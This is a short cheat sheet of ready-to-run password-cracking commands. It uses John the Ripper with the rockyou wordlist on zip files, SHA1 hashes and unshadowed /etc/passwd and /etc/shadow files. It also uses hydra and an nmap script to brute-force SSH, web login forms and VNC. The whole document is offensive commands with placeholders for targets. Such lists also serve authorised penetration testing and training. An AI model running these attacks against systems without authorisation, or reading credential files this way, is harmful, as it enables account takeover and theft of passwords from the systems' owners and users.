% Crack: Passwords

# Crack a password protected zip file
zip2john <filename> > filename.hash
john filename.hash --wordlist="/usr/share/wordlists/rockyou.txt" --verbosity=5

# SSH PW Brute Force user
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>

# Web Form Password Brute Force (default sheme)
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V 

# Web Form Password Brute Force (default sheme)
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "<http-post-form>" -V

# VNC password with hydra
hydra -P /usr/share/wordlists/rockyou.txt <IP> vnc

# VNC password with nmap
nmap --script vnc-brute -p 5900 <IP>

# Crack sha1 with John username:sha1hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 <filename>

# combine and crack passwd and shadow files
unshadow /etc/passwd /etc/shadow | john

